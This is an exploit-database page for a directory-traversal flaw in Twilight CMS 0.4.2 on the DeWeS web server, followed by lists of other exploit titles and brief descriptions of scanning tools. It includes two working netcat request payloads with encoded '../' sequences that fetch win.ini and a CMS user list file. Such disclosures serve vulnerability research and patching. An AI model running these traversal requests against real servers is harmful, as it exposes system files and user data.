Menu

Search for hundreds of thousands of exploits

"Twilight CMS - DeWeS Web Server Directory Traversal"

Author

Exploit author

"High-Tech Bridge"

Platform

Exploit platform

php

Release date

Exploit published date

2013-08-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
source: https://www.securityfocus.com/bid/61906/info

Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

Twilight CMS 0.4.2 is vulnerable; other versions may also be affected. 

nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1

nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2014-08-20 "ArticleFR - 'id' SQL Injection" webapps php "High-Tech Bridge"
2014-07-23 "Ilya Birman E2 - '/@actions/comment-process' SQL Injection" webapps php "High-Tech Bridge"
2014-05-08 "TOA - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-03-24 "Symphony 2.2.4 - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-01-28 "Eventum 2.3.4 - 'hostname' Remote Code Execution" webapps php "High-Tech Bridge"
2014-01-27 "Eventum - Insecure File Permissions" webapps php "High-Tech Bridge"
2014-01-16 "Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection" webapps php "High-Tech Bridge"
2013-12-11 "eduTrac - 'showmask' Directory Traversal" webapps php "High-Tech Bridge"
2013-08-21 "Twilight CMS - DeWeS Web Server Directory Traversal" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-24 "WordPress Plugin Duplicator - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-07-24 "Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-06-26 "Xaraya - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/forgot_password?error' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/login?Username' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-03 "FUDforum - Multiple Remote PHP Code Injection Vulnerabilities" webapps php "High-Tech Bridge"
2013-04-03 "Symphony - 'sort' SQL Injection" webapps php "High-Tech Bridge"
2013-02-27 "Geeklog - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin Wysija Newsletters - Multiple SQL Injections" webapps php "High-Tech Bridge"
2013-01-31 "Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities" remote multiple "High-Tech Bridge"
2013-01-09 "Quick.CMS / Quick.Cart - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-01-09 "Samsung Kies - Remote Buffer Overflow" remote windows "High-Tech Bridge"
2012-12-10 "Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities" webapps cgi "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple SQL Injections" webapps php "High-Tech Bridge"
2012-11-07 "OrangeHRM - 'sortField' SQL Injection" webapps php "High-Tech Bridge"
2012-10-17 "jCore - '/admin/index.php?path' Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-10-10 "OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting" webapps php "High-Tech Bridge"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.